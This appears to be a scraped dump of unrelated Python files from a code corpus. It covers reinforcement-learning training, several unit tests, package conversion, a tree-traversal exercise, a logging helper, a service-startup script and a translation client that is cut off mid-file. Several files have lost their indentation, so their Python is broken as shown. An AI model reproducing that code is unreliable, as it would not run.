# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Train and Eval multi-agent PPO for multi-agent gridworld.
Each agent learns an independent policy.
Note: this code always assumes the network has an RNN to track other agents'
state.
To run:
```bash tensorboard.sh --port=2222 --logdir /tmp/multigrid/ppo/
python -m multiagent_train_eval.py --root_dir=/tmp/multigrid/ppo/
```
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
from absl import app
from absl import flags
from absl import logging
import gin
from tf_agents.system import system_multiprocessing
# Import needed to trigger env registration, so pylint: disable=unused-import
from social_rl import gym_multigrid
from social_rl.multiagent_tfagents import football_gym_env
from social_rl.multiagent_tfagents import multiagent_gym_suite
from social_rl.multiagent_tfagents import multiagent_metrics
from social_rl.multiagent_tfagents import multiagent_ppo
from social_rl.multiagent_tfagents import multiagent_train_eval
from social_rl.multiagent_tfagents import utils
from social_rl.multiagent_tfagents.joint_attention import attention_ppo_agent
FLAGS = flags.FLAGS
flags.DEFINE_string('attention_bonus_type', 'kld',
'Method for computing attention bonuses.')
flags.DEFINE_float('bonus_ratio', 0.00, 'Final multiplier for bonus rewards.')
flags.DEFINE_integer('bonus_timescale', int(1e6),
'Attention bonuses scale linearly until this point.')
def main(_):
logging.set_verbosity(logging.INFO)
agent_class = functools.partial(
attention_ppo_agent.MultiagentAttentionPPO,
attention_bonus_type=FLAGS.attention_bonus_type,
bonus_ratio=FLAGS.bonus_ratio,
bonus_timescale=FLAGS.bonus_timescale
)
if 'academy' in FLAGS.env_name:
env_load_fn = football_gym_env.load
gin.bind_parameter('construct_attention_networks.use_stacks', True)
gin.bind_parameter('AttentionMultiagentPPOPolicy.use_stacks', True)
else:
env_load_fn = multiagent_gym_suite.load
multiagent_train_eval.train_eval(
FLAGS.root_dir,
env_load_fn=env_load_fn,
agent_class=agent_class,
env_name=FLAGS.env_name,
num_environment_steps=FLAGS.num_environment_steps,
collect_episodes_per_iteration=FLAGS.collect_episodes_per_iteration,
num_parallel_environments=FLAGS.num_parallel_environments,
replay_buffer_capacity=FLAGS.replay_buffer_capacity,
num_epochs=FLAGS.num_epochs,
num_eval_episodes=FLAGS.num_eval_episodes,
train_checkpoint_interval=FLAGS.train_checkpoint_interval,
policy_checkpoint_interval=FLAGS.policy_checkpoint_interval,
log_interval=FLAGS.log_interval,
summary_interval=FLAGS.summary_interval,
actor_fc_layers=(FLAGS.actor_fc_layers_size, FLAGS.actor_fc_layers_size),
value_fc_layers=(FLAGS.value_fc_layers_size, FLAGS.value_fc_layers_size),
lstm_size=(FLAGS.lstm_size,),
conv_filters=FLAGS.conv_filters,
conv_kernel=FLAGS.conv_kernel,
direction_fc=FLAGS.direction_fc,
debug=FLAGS.debug,
inactive_agent_ids=tuple(),
random_seed=FLAGS.random_seed,
reinit_checkpoint_dir=FLAGS.reinit_checkpoint_dir,
use_attention_networks=True)
if __name__ == '__main__':
flags.mark_flag_as_required('root_dir')
system_multiprocessing.handle_main(lambda _: app.run(main))
|
tests/integrations/modules/test_modules.py | cmalek/sentry-python | 1,213 | 12691479 | import sentry_sdk
from sentry_sdk.integrations.modules import ModulesIntegration
def test_basic(sentry_init, capture_events):
sentry_init(integrations=[ModulesIntegration()])
events = capture_events()
sentry_sdk.capture_exception(ValueError())
(event,) = events
assert "sentry-sdk" in event["modules"]
assert "pytest" in event["modules"]
|
test/dropout_test.py | alimhanif/blocksparse | 903 | 12691481 | #!/usr/bin/env python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
import blocksparse as bs
from tensorflow.python.ops import gradient_checker
def ceil_div(x, y):
return -(-x // y)
shapes = [
# [ [32, 32], [ [32, 1] ] ],
[ [ 64,], [ None, ] ],
[ [1024,], [ None, ] ],
[ [1023,], [ None, ] ],
[ [1024, 128], [ [1024, 1], [1, 128], None ] ],
[ [1023, 127], [ [1023, 1], [1, 127], None ] ],
[ [64, 64, 64], [ [64, 64, 1], [64, 1, 64], [1,64,64], [1,64,1], [64,1,1], [1,1,64], [1,1,1], None ] ],
[ [63, 63, 63], [ [63, 63, 1], [63, 1, 63], [1,63,63], [1,63,1], [63,1,1], [1,1,63], [1,1,1], None ] ],
[ [16,16,16,16,16], [ [16,16,16,16,1], None ] ],
]
class DropoutTest(tf.test.TestCase):
def testDropout(self):
config = tf.ConfigProto(
intra_op_parallelism_threads=1,
inter_op_parallelism_threads=1)
with self.test_session(config=config) as sess:
bs.set_entropy()
sess.run(tf.global_variables_initializer())
# with tf.device("/gpu:0"):
# x = tf.ones([10000])*-10.0
# g = bs.concrete_gate(x)
# g = sess.run(g)
# print(g.sum()/g.size)
# error = gradient_checker.compute_gradient_error(x, x.shape, g, g.shape) #, extra_feed_dict={ x: cpuX, m: mask }
# print(error)
for dtype in (tf.float16, ): #tf.float16, tf.bfloat16
for x_shape, mask_shapes in shapes:
for mask_shape in mask_shapes:
m_shape = x_shape if mask_shape is None else mask_shape
cpuO = np.ones(x_shape, dtype=np.float32)
cpuX = np.random.uniform(-1.0, 1.0, x_shape).astype(np.float16).astype(np.float32)
cpuM = np.random.randint(0, 2, size=m_shape, dtype=np.bool)
mask = np.zeros(ceil_div(cpuM.size, 32)*32, dtype=np.bool)
mask[:cpuM.size] = cpuM.reshape(-1)
mask = np.packbits(mask.reshape(-1,8)[:,::-1]).view(np.int32)
cpuY = cpuX * cpuM.astype(np.float32) * 2.0
with tf.device("/gpu:0"):
x = tf.placeholder(tf.float32, cpuX.shape)
m = tf.placeholder(tf.int32, mask.shape)
xf = bs.float_cast(x, dtype=dtype)
y, _ = bs.dropout(xf, keep_prob=0.5, mask=m, mask_shape=mask_shape)
y = bs.float_cast(y, dtype=tf.float32)
devY, = sess.run( [y,], feed_dict={ x: cpuX, m: mask } )
xf = bs.float_cast(x, dtype=dtype)
y, _ = bs.dropout(xf, keep_prob=0.8, mask_shape=mask_shape)
y = bs.float_cast(y, dtype=tf.float32)
devO, = sess.run( [y,], feed_dict={ x: cpuO } )
diff = np.abs(devY - cpuY)
print("dype: %8s x_shape: %-20s m_shape: %-20s err: %4.2f norm_sum: %4.2f" % ( dtype.name, str(x_shape), str(mask_shape), diff.sum(), devO.sum()/devO.size ))
#np.savetxt( "diff.txt", diff, fmt="%4.2f")
if __name__ == "__main__":
tf.test.main()
|
plugins/quetz_transmutation/quetz_transmutation/jobs.py | maresb/quetz | 108 | 12691499 | import json
import logging
import os
import shutil
from pathlib import Path
from tempfile import TemporaryDirectory
from conda_package_handling.api import _convert
from quetz.condainfo import calculate_file_hashes_and_size
from quetz.dao import Dao
from quetz.pkgstores import PackageStore
logger = logging.getLogger("quetz.plugins")
def transmutation(package_version: dict, config, pkgstore: PackageStore, dao: Dao):
filename: str = package_version["filename"]
channel: str = package_version["channel_name"]
package_format: str = package_version["package_format"]
package_name: str = package_version["package_name"]
platform = package_version["platform"]
version = package_version["version"]
build_number = package_version["build_number"]
build_string = package_version["build_string"]
uploader_id = package_version["uploader_id"]
info = json.loads(package_version["info"])
if package_format == "tarbz2" or not filename.endswith(".tar.bz2"):
return
fh = pkgstore.serve_path(channel, Path(platform) / filename)
with TemporaryDirectory() as tmpdirname:
local_file_name = os.path.join(tmpdirname, filename)
with open(local_file_name, "wb") as local_file:
# chunk size 10MB
shutil.copyfileobj(fh, local_file, 10 * 1024 * 1024)
fn, out_fn, errors = _convert(local_file_name, ".conda", tmpdirname, force=True)
if errors:
logger.error(f"transmutation errors --> {errors}")
return
filename_conda = os.path.basename(filename).replace('.tar.bz2', '.conda')
logger.info(f"Adding file to package store: {Path(platform) / filename_conda}")
with open(out_fn, 'rb') as f:
calculate_file_hashes_and_size(info, f)
f.seek(0)
pkgstore.add_package(f, channel, str(Path(platform) / filename_conda))
version = dao.create_version(
channel,
package_name,
"conda",
platform,
version,
build_number,
build_string,
filename_conda,
json.dumps(info),
uploader_id,
info["size"],
upsert=True,
)
if os.path.exists(out_fn):
os.remove(out_fn)
|
binary_tree_zigzag_level_order_traversal/solution.py | mahimadubey/leetcode-python | 528 | 12691529 | <gh_stars>100-1000
"""
Given a binary tree, return the zigzag level order traversal of its nodes'
values. (ie, from left to right, then right to left for the next level and
alternate between).
For example:
Given binary tree {3,9,20,#,#,15,7},
3
/ \
9 20
/ \
15 7
return its zigzag level order traversal as:
[
[3],
[20,9],
[15,7]
]
"""
# Definition for a binary tree node
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
# @param root, a tree node
# @return a list of lists of integers
def zigzagLevelOrder(self, root):
if root is None:
return []
res = []
queue = []
rev = False # Reverse direction
level = []
queue.append(root)
queue.append(None)
while queue:
root = queue.pop(0)
if root is None:
if queue:
queue.append(None)
res.append(level)
level = []
rev = not rev # Toggle direction
else:
if rev:
level.insert(0, root.val)
else:
level.append(root.val)
if root.left is not None:
queue.append(root.left)
if root.right is not None:
queue.append(root.right)
return res
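if __name__ == "__main__":
    # Illustrative usage sketch (added; not part of the original solution).
    # A minimal TreeNode stand-in is defined here because the real one is
    # only provided as a comment above. Builds the docstring's sample tree
    # {3,9,20,#,#,15,7}; expected output: [[3], [20, 9], [15, 7]].
    class TreeNode:
        def __init__(self, x):
            self.val = x
            self.left = None
            self.right = None

    root = TreeNode(3)
    root.left = TreeNode(9)
    root.right = TreeNode(20)
    root.right.left = TreeNode(15)
    root.right.right = TreeNode(7)
    print(Solution().zigzagLevelOrder(root))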
|
tests/benchmarks/string-methods/format.py | abeaumont/Dictu | 116 | 12691536 | <filename>tests/benchmarks/string-methods/format.py
import time
start = time.perf_counter()
for _ in range(10000):
x = "{} {}".format("test", "test")
print(time.perf_counter() - start) |
bbcm/utils/logger.py | okcd00/BertBasedCorrectionModels | 158 | 12691540 | """
@Time : 2021-01-21 11:50:55
@File : logger.py
@Author : Abtion
@Email : <EMAIL>
"""
import logging
import os
import sys
def setup_logger(name, save_dir, distributed_rank):
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
# don't log results for the non-master process
if distributed_rank > 0:
return logger
ch = logging.StreamHandler(stream=sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s: %(message)s")
ch.setFormatter(formatter)
logger.addHandler(ch)
if save_dir:
if not os.path.exists(save_dir):
os.makedirs(save_dir)
fh = logging.FileHandler(os.path.join(save_dir, "log.txt"), encoding='utf8')
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger
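if __name__ == "__main__":
    # Hedged usage sketch (added; not part of the original module). The name
    # and save_dir below are placeholders: rank 0 logs to stdout and to
    # save_dir/log.txt, while non-zero ranks get a handler-less logger.
    demo_logger = setup_logger("bbcm.demo", "./output/logs", distributed_rank=0)
    demo_logger.info("logger initialised")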
|
loop_if_else_break.py | NightmareQAQ/python-notes | 106 | 12691551 | def contains_magic_number(list1, magic_number):
for i in list1:
if i == magic_number:
print("This list contains the magic number")
            # without the break, the loop would keep running unnecessarily
break
else:
print("This list does NOT contain the magic number")
if __name__ == "__main__":
contains_magic_number(range(10), 3)
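    # Added illustrative call (not in the original): 13 is absent from
    # range(10), so the loop finishes without break and the for-else
    # branch prints the "does NOT contain" message.
    contains_magic_number(range(10), 13)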
|
startup.py | ExE-Boss/mdn-samples-server | 900 | 12691553 | <reponame>ExE-Boss/mdn-samples-server
#!/usr/bin/python
#
# MDN Sample Server
# Start up samples as needed.
#
# Any copyright is dedicated to the Public Domain.
# http://creativecommons.org/publicdomain/zero/1.0/
#
import os
import sys
import subprocess
import pwd
#
# startService
#
# Given a path, start up the service contained in that directory.
# This is done by running the "startup.sh" script in each directory.
# The bash shell is used.
#
def startService(path):
print("Starting service: " + path)
startupScript = path + "/" + "startup.sh"
if os.path.exists(startupScript):
sys.stdout.flush()
# pw_record = pwd.getpwnam("apache")
# env = os.environ.copy()
# env['HOME'] = pw_record.pw_dir
# env['LOGNAME'] = pw_record.pw_name
# env['PWD'] = path
# env['USER'] = pw_record.pw_name
process = subprocess.Popen(
# ["/bin/bash", startupScript], cwd = path, env = env, preexec_fn=demoteUser(pw_record.pw_uid, pw_record.pw_gid)
["/bin/bash", startupScript], cwd = path
)
# TODO: At some point we should record process IDs for restarts/shutdowns/etc
#
# demoteUser
#
# Downgrade to execute the process using the specified user ID and group ID.
#
def demoteUser(user_uid, user_gid):
def result():
os.setgid(user_gid)
os.setuid(user_uid)
return result
#
# Main program
#
# Get the Web content directory, tack on "/s", and get a list of the
# contents of that directory
scriptDir = os.path.dirname(os.path.abspath(__file__))
if not scriptDir.endswith("/"):
scriptDir += "/"
serviceDir = scriptDir + "s"
serviceList = os.listdir(serviceDir)
# For each directory in the service directory,
# call startService() to start it up.
for name in serviceList:
if name[0] != '.':
path = serviceDir + "/" + name
if os.path.isdir(path):
startService(path)
|
tests/test_client_subscription.py | vivekhub/razorpay-python | 125 | 12691554 | <filename>tests/test_client_subscription.py
import responses
import json
from .helpers import mock_file, ClientTestCase
class TestClientSubscription(ClientTestCase):
def setUp(self):
super(TestClientSubscription, self).setUp()
self.base_url = '{}/subscriptions'.format(self.base_url)
self.subscription_id = 'sub_8RlLljfA4AnDVx'
@responses.activate
def test_subscription_fetch_all(self):
result = mock_file('subscription_collection')
url = self.base_url
responses.add(responses.GET, url, status=200,
body=json.dumps(result), match_querystring=True)
self.assertEqual(self.client.subscription.all(), result)
@responses.activate
def test_subscription_fetch(self):
result = mock_file('fake_subscription')
url = '{}/{}'.format(self.base_url, 'fake_subscription_id')
responses.add(responses.GET, url, status=200, body=json.dumps(result),
match_querystring=True)
self.assertEqual(
self.client.subscription.fetch('fake_subscription_id'),
result)
@responses.activate
def test_subscription_create(self):
init = mock_file('init_subscription')
result = mock_file('fake_subscription')
url = self.base_url
responses.add(responses.POST, url, status=200, body=json.dumps(result),
match_querystring=True)
self.assertEqual(self.client.subscription.create(init), result)
@responses.activate
def test_subscription_cancel(self):
result = mock_file('fake_subscription_cancelled')
url = '{}/{}/cancel'.format(self.base_url, self.subscription_id)
responses.add(responses.POST, url, status=200, body=json.dumps(result),
match_querystring=True)
response = json.loads(
self.client.subscription.cancel(self.subscription_id))
self.assertEqual(response['id'], self.subscription_id)
self.assertEqual(response['entity'], 'subscription')
self.assertEqual(response['status'], 'cancelled')
@responses.activate
def test_subscription_create_addon(self):
result = mock_file('fake_subscription_addon')
url = '{}/{}/addons'.format(self.base_url, self.subscription_id)
responses.add(responses.POST,
url,
status=200,
body=json.dumps(result),
match_querystring=True)
response = json.loads(
self.client.subscription.createAddon(
self.subscription_id,
{'item': {'name': 'Extra Chair', 'amount': 30000,
'currency': 'INR'}, 'quantity': 2}))
self.assertEqual(response['subscription_id'], self.subscription_id)
self.assertEqual(response['entity'], 'addon')
self.assertEqual(response['item']['name'], 'Extra Chair')
self.assertEqual(response['item']['amount'], 30000)
|
plenario/api/jobs.py | vforgione/plenario | 109 | 12691568 | <reponame>vforgione/plenario
import pickle
from flask import jsonify
from plenario.database import postgres_base, postgres_engine as engine
from plenario.utils.helpers import reflect
def get_job(ticket: str):
celery_taskmeta = reflect('celery_taskmeta', postgres_base.metadata, engine)
query = celery_taskmeta.select().where(celery_taskmeta.c.task_id == ticket)
job_meta = dict(query.execute().first().items())
job_meta['result'] = pickle.loads(job_meta['result'])
return job_meta
def make_job_response(endpoint, validated_query):
msg = 'This feature, enabled by the jobs=true flag, is currently ' \
'undergoing maintenance, we apologize for any inconvenience.'
return jsonify({'unavailable': msg})
|
maggot/config.py | ex4sperans/mag | 107 | 12691599 | from collections import OrderedDict
from maggot import get_current_separator
from maggot.containers import NestedContainer
class Config(NestedContainer):
@property
def identifier(self):
"""
Maps config parameters into a single string that shortly
        summarizes the content of the config's fields. Fields are sorted
to provide deterministic output.
Example:
>>> config = dict(a=10, b=dict(c=20))
>>> config = Config.from_dict(config)
>>> config.identifier
'10-20'
"""
parameters = self.as_flat_dict()
def sort_key(item):
name, attr = item
*prefix, base = name.split(".")
return base
def is_descriptive(key):
*prefix, base = key.split(".")
return not base.startswith("_")
# convert values to strings
parameters = OrderedDict((k, value_to_string(v, k))
for k, v in parameters.items())
# discard parameters that start with underscore
# by convention, they are considered as `non-descriptive`
# i.e. not used in the identifier
parameters = OrderedDict((k, v) for k, v in parameters.items()
if is_descriptive(k))
return get_current_separator().join(parameters.values())
def value_to_string(value, name):
"""Translates values (e.g. lists, ints, booleans) to strings"""
def last(name):
*prefix, base = name.split(".")
return base
if isinstance(value, list):
return "x".join(map(str, value))
if isinstance(value, bool):
return last(name) if value else "no_" + last(name)
else:
return str(value) |
scripts/configure-file.py | kasymovga/taisei | 573 | 12691606 | #!/usr/bin/env python3
import taiseilib.common
import taiseilib.configure
taiseilib.common.run_main(taiseilib.configure.main)
|
psonic/effects.py | m-roberts/python-sonic | 263 | 12691612 | <reponame>m-roberts/python-sonic
"""Effects"""
class FxName:
"""FX name"""
def __init__(self, name):
self.name = name
BITCRUSHER = FxName('bitcrusher')
COMPRESSOR = FxName('compressor')
ECHO = FxName('echo')
FLANGER = FxName('flanger')
KRUSH = FxName('krush')
LPF = FxName('lpf')
PAN = FxName('pan')
PANSLICER = FxName('panslicer')
REVERB = FxName('reverb')
SLICER = FxName('slicer')
WOBBLE = FxName('wobble')
|
lib/translator.py | damonchen/vim | 699 | 12691629 | <filename>lib/translator.py
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#======================================================================
#
# translator.py - command-line translator (Google, Bing, Baidu, Youdao, iCIBA)
#
# Created by skywind on 2019/06/14
# Version: 1.0.2, Last Modified: 2019/06/18 18:40
#
#======================================================================
from __future__ import print_function, unicode_literals
import sys
import time
import os
import re
import random
import copy
import json
import codecs
import pprint
#----------------------------------------------------------------------
# Encoding compatibility (Python 2/3)
#----------------------------------------------------------------------
if sys.version_info[0] < 3:
reload(sys) # noqa: F821
sys.setdefaultencoding('utf-8')
# sys.stdout = codecs.getwriter('utf-8')(sys.stdout, 'ignore')
# sys.stderr = codecs.getwriter('utf-8')(sys.stderr, 'ignore')
else:
# sys.stdout = codecs.getwriter('utf-8')(sys.stdout.buffer, 'ignore')
# sys.stderr = codecs.getwriter('utf-8')(sys.stderr.buffer, 'ignore')
pass
#----------------------------------------------------------------------
# Language name aliases
#----------------------------------------------------------------------
langmap = {
"arabic": "ar",
"bulgarian": "bg",
"catalan": "ca",
"chinese": "zh-CN",
"chinese simplified": "zh-CHS",
"chinese traditional": "zh-CHT",
"czech": "cs",
"danish": "da",
"dutch": "nl",
"english": "en",
"estonian": "et",
"finnish": "fi",
"french": "fr",
"german": "de",
"greek": "el",
"haitian creole": "ht",
"hebrew": "he",
"hindi": "hi",
"hmong daw": "mww",
"hungarian": "hu",
"indonesian": "id",
"italian": "it",
"japanese": "ja",
"klingon": "tlh",
"klingon (piqad)":"tlh-Qaak",
"korean": "ko",
"latvian": "lv",
"lithuanian": "lt",
"malay": "ms",
"maltese": "mt",
"norwegian": "no",
"persian": "fa",
"polish": "pl",
"portuguese": "pt",
"romanian": "ro",
"russian": "ru",
"slovak": "sk",
"slovenian": "sl",
"spanish": "es",
"swedish": "sv",
"thai": "th",
"turkish": "tr",
"ukrainian": "uk",
"urdu": "ur",
"vietnamese": "vi",
"welsh": "cy"
}
#----------------------------------------------------------------------
# BasicTranslator
#----------------------------------------------------------------------
class BasicTranslator(object):
def __init__ (self, name, **argv):
self._name = name
self._config = {}
self._options = argv
self._session = None
self._agent = None
self._load_config(name)
self._check_proxy()
def __load_ini (self, ininame, codec = None):
config = {}
if not ininame:
return None
elif not os.path.exists(ininame):
return None
try:
content = open(ininame, 'rb').read()
except IOError:
content = b''
if content[:3] == b'\xef\xbb\xbf':
text = content[3:].decode('utf-8')
elif codec is not None:
text = content.decode(codec, 'ignore')
else:
codec = sys.getdefaultencoding()
text = None
for name in [codec, 'gbk', 'utf-8']:
try:
text = content.decode(name)
break
except:
pass
if text is None:
text = content.decode('utf-8', 'ignore')
if sys.version_info[0] < 3:
import StringIO
import ConfigParser
sio = StringIO.StringIO(text)
cp = ConfigParser.ConfigParser()
cp.readfp(sio)
else:
import configparser
cp = configparser.ConfigParser(interpolation = None)
cp.read_string(text)
for sect in cp.sections():
for key, val in cp.items(sect):
lowsect, lowkey = sect.lower(), key.lower()
config.setdefault(lowsect, {})[lowkey] = val
if 'default' not in config:
config['default'] = {}
return config
def _load_config (self, name):
self._config = {}
ininame = os.path.expanduser('~/.config/translator/config.ini')
config = self.__load_ini(ininame)
if not config:
return False
for section in ('default', name):
items = config.get(section, {})
for key in items:
self._config[key] = items[key]
return True
def _check_proxy (self):
proxy = os.environ.get('all_proxy', None)
if not proxy:
return False
if not isinstance(proxy, str):
return False
if 'proxy' not in self._config:
self._config['proxy'] = proxy.strip()
return True
def request (self, url, data = None, post = False, header = None):
import requests
if not self._session:
self._session = requests.Session()
argv = {}
if header is not None:
header = copy.deepcopy(header)
else:
header = {}
if self._agent:
header['User-Agent'] = self._agent
argv['headers'] = header
timeout = self._config.get('timeout', 7)
proxy = self._config.get('proxy', None)
if timeout:
argv['timeout'] = float(timeout)
if proxy:
proxies = {'http': proxy, 'https': proxy}
argv['proxies'] = proxies
if not post:
if data is not None:
argv['params'] = data
else:
if data is not None:
argv['data'] = data
if not post:
r = self._session.get(url, **argv)
else:
r = self._session.post(url, **argv)
return r
def http_get (self, url, data = None, header = None):
return self.request(url, data, False, header)
def http_post (self, url, data = None, header = None):
return self.request(url, data, True, header)
def url_unquote (self, text, plus = True):
if sys.version_info[0] < 3:
import urllib
if plus:
return urllib.unquote_plus(text)
return urllib.unquote(text)
import urllib.parse
if plus:
return urllib.parse.unquote_plus(text)
return urllib.parse.unquote(text)
def url_quote (self, text, plus = True):
if sys.version_info[0] < 3:
import urllib
if isinstance(text, unicode): # noqa: F821
text = text.encode('utf-8', 'ignore')
if plus:
return urllib.quote_plus(text)
            return urllib.quote(text)
import urllib.parse
if plus:
return urllib.parse.quote_plus(text)
return urllib.parse.quote(text)
def create_translation (self, sl = None, tl = None, text = None):
res = {}
res['engine'] = self._name
        res['sl'] = sl              # source language
        res['tl'] = tl              # target language
        res['text'] = text          # text to translate
        res['phonetic'] = None      # phonetic transcription
        res['definition'] = None    # short definition
        res['explain'] = None       # explanations, one per line
return res
    # Translation result: subclasses must fill in the fields created above
def translate (self, sl, tl, text):
return self.create_translation(sl, tl, text)
    # Is the text English (pure ASCII)?
def check_english (self, text):
for ch in text:
if ord(ch) >= 128:
return False
return True
    # Guess the source/target languages
def guess_language (self, sl, tl, text):
if ((not sl) or sl == 'auto') and ((not tl) or tl == 'auto'):
if self.check_english(text):
sl, tl = ('en-US', 'zh-CN')
else:
sl, tl = ('zh-CN', 'en-US')
if sl.lower() in langmap:
sl = langmap[sl.lower()]
if tl.lower() in langmap:
tl = langmap[tl.lower()]
return sl, tl
def md5sum (self, text):
import hashlib
m = hashlib.md5()
if sys.version_info[0] < 3:
if isinstance(text, unicode): # noqa: F821
text = text.encode('utf-8')
else:
if isinstance(text, str):
text = text.encode('utf-8')
m.update(text)
return m.hexdigest()
#----------------------------------------------------------------------
# Azure Translator
#----------------------------------------------------------------------
class AzureTranslator (BasicTranslator):
def __init__ (self, **argv):
super(AzureTranslator, self).__init__('azure', **argv)
if 'apikey' not in self._config:
sys.stderr.write('error: missing apikey in [azure] section\n')
sys.exit()
self.apikey = self._config['apikey']
def translate (self, sl, tl, text):
import uuid
sl, tl = self.guess_language(sl, tl, text)
qs = self.url_quote(sl)
qt = self.url_quote(tl)
url = 'https://api.cognitive.microsofttranslator.com/translate'
url += '?api-version=3.0&from={}&to={}'.format(qs, qt)
headers = {
'Ocp-Apim-Subscription-Key': self.apikey,
'Content-type': 'application/json',
'X-ClientTraceId': str(uuid.uuid4())
}
body = [{'text': text}]
import json
resp = self.http_post(url, json.dumps(body), headers).json()
# print(resp)
res = {}
res['text'] = text
res['sl'] = sl
res['tl'] = tl
res['translation'] = self.render(resp)
res['html'] = None
res['xterm'] = None
return res
def render (self, resp):
if not resp:
return ''
x = resp[0]
if not x:
return ''
y = x['translations']
if not y:
return ''
output = ''
for item in y:
output += item['text'] + '\n'
return output
#----------------------------------------------------------------------
# Google Translator
#----------------------------------------------------------------------
class GoogleTranslator (BasicTranslator):
def __init__ (self, **argv):
super(GoogleTranslator, self).__init__('google', **argv)
self._agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0)'
self._agent += ' Gecko/20100101 Firefox/59.0'
def get_url (self, sl, tl, qry):
http_host = self._config.get('host', 'translate.googleapis.com')
qry = self.url_quote(qry)
url = 'https://{}/translate_a/single?client=gtx&sl={}&tl={}&dt=at&dt=bd&dt=ex&' \
'dt=ld&dt=md&dt=qca&dt=rw&dt=rm&dt=ss&dt=t&q={}'.format(
http_host, sl, tl, qry) # noqa: E216
return url
def translate (self, sl, tl, text):
sl, tl = self.guess_language(sl, tl, text)
self.text = text
url = self.get_url(sl, tl, text)
r = self.http_get(url)
if not r:
return None
try:
obj = r.json()
except:
return None
# pprint.pprint(obj)
res = self.create_translation(sl, tl, text)
res['phonetic'] = self.get_phonetic(obj)
res['definition'] = self.get_definition(obj)
res['explain'] = self.get_explain(obj)
res['detail'] = self.get_detail(obj)
res['alternative'] = self.get_alternative(obj)
return res
def get_phonetic (self, obj):
for x in obj[0]:
if len(x) == 4:
return x[3]
return None
def get_definition (self, obj):
paraphrase = ''
for x in obj[0]:
if x[0]:
paraphrase += x[0]
return paraphrase
def get_explain (self, obj):
explain = []
if obj[1]:
for x in obj[1]:
expl = '[{}] '.format(x[0][0])
for i in x[2]:
expl += i[0] + ';'
explain.append(expl)
return explain
def get_detail (self, resp):
result = []
if len(resp) < 13:
return None
for x in resp[12]:
result.append('[{}]'.format(x[0]))
for y in x[1]:
result.append('- {}'.format(y[0]))
if len(y) >= 3:
result.append(' * {}'.format(y[2]))
return result
def get_alternative (self, resp):
definition = self.get_definition(resp)
result = []
if len(resp) < 6:
return None
for x in resp[5]:
# result.append('- {}'.format(x[0]))
for i in x[2]:
if i[0] != definition:
result.append(' * {}'.format(i[0]))
return result
#----------------------------------------------------------------------
# Youdao Translator
#----------------------------------------------------------------------
class YoudaoTranslator (BasicTranslator):
def __init__ (self, **argv):
super(YoudaoTranslator, self).__init__('youdao', **argv)
self.url = 'https://fanyi.youdao.com/translate_o?smartresult=dict&smartresult=rule'
self.D = "ebSeFb%=XZ%T[KZ)c(sy!"
self.D = "97_3(jkMYg@T[KZQmqjTK"
def get_md5 (self, value):
import hashlib
m = hashlib.md5()
# m.update(value)
m.update(value.encode('utf-8'))
return m.hexdigest()
def sign (self, text, salt):
s = "fanyideskweb" + text + salt + self.D
return self.get_md5(s)
def translate (self, sl, tl, text):
sl, tl = self.guess_language(sl, tl, text)
self.text = text
salt = str(int(time.time() * 1000) + random.randint(0, 10))
sign = self.sign(text, salt)
header = {
'Cookie': '[email protected];',
'Referer': 'http://fanyi.youdao.com/',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:51.0) Gecko/20100101 Firefox/51.0',
}
data = {
'i': text,
'from': sl,
'to': tl,
'smartresult': 'dict',
'client': 'fanyideskweb',
'salt': salt,
'sign': sign,
'doctype': 'json',
'version': '2.1',
'keyfrom': 'fanyi.web',
'action': 'FY_BY_CL1CKBUTTON',
'typoResult': 'true'
}
r = self.http_post(self.url, data, header)
if not r:
return None
try:
obj = r.json()
except:
return None
# pprint.pprint(obj)
res = self.create_translation(sl, tl, text)
res['definition'] = self.get_definition(obj)
res['explain'] = self.get_explain(obj)
return res
def get_definition (self, obj):
translation = ''
t = obj.get('translateResult')
if t:
for n in t:
part = []
for m in n:
x = m.get('tgt')
if x:
part.append(x)
if part:
translation += ', '.join(part)
return translation
def get_explain (self, obj):
explain = []
if 'smartResult' in obj:
smarts = obj['smartResult']['entries']
for entry in smarts:
if entry:
entry = entry.replace('\r', '')
entry = entry.replace('\n', '')
explain.append(entry)
return explain
#----------------------------------------------------------------------
# Bing2: free web endpoint, single-word lookup only
#----------------------------------------------------------------------
class BingDict (BasicTranslator):
def __init__ (self, **argv):
super(BingDict, self).__init__('bingdict', **argv)
self._agent = 'Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101'
self._agent += ' Firefox/50.0'
self._url = 'http://bing.com/dict/SerpHoverTrans'
self._cnurl = 'http://cn.bing.com/dict/SerpHoverTrans'
def translate (self, sl, tl, text):
url = ('zh' in tl) and self._cnurl or self._url
url = self._cnurl
url = url + '?q=' + self.url_quote(text)
headers = {
# 'Host': 'cn.bing.com',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
}
resp = self.http_get(url, None, headers)
if not resp:
return None
resp = resp.text
res = self.create_translation(sl, tl, text)
res['sl'] = 'auto'
res['tl'] = 'auto'
res['text'] = text
res['phonetic'] = self.get_phonetic(resp)
res['explain'] = self.get_explain(resp)
return res
def get_phonetic (self, html):
if not html:
return ''
m = re.findall(
r'<span class="ht_attr" lang=".*?">\[(.*?)\] </span>', html)
if not m:
return None
return m[0].strip()
def get_explain (self, html):
if not html:
return []
m = re.findall(
r'<span class="ht_pos">(.*?)</span><span class="ht_trs">(.*?)</span>', html)
expls = []
for item in m:
expls.append('%s %s' % item)
return expls
#----------------------------------------------------------------------
# Baidu Translator
#----------------------------------------------------------------------
class BaiduTranslator (BasicTranslator):
def __init__ (self, **argv):
super(BaiduTranslator, self).__init__('baidu', **argv)
if 'apikey' not in self._config:
sys.stderr.write('error: missing apikey in [baidu] section\n')
sys.exit()
if 'secret' not in self._config:
